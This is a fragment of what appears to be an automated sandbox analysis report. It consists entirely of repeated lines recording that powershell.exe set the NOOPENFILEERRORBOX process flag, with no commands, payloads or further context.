                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
